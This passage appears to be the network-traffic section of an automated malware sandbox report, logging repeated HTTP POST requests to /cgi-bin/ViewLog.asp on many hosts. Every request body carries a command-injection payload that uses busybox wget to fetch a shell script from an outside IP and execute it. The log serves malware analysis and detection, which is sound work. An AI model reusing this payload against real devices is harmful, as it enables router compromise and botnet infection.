                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:45.317539930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:47.909138918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:53.028477907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:03.010989904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:22.720196009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:03.674483061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            7192.168.2.236042485.245.147.1148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.437974930 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            8192.168.2.234908294.120.32.2208080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.520986080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            9192.168.2.234455294.120.218.578080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.521034956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            10192.168.2.233757031.136.123.978080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:43.980249882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:44.613548994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:45.861334085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:48.420980930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:53.540263891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:03.522876024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:24.767982006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:05.722162008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            11192.168.2.235104431.136.149.448080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:44.007483006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:44.709573984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:46.117311001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:48.932920933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:54.564254999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:05.826544046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:28.863339901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:13.913063049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            12192.168.2.234708031.136.121.1018080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:44.007508039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:44.709559917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:46.117301941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:48.932926893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:54.564246893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:05.826544046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:28.863328934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:13.913044930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
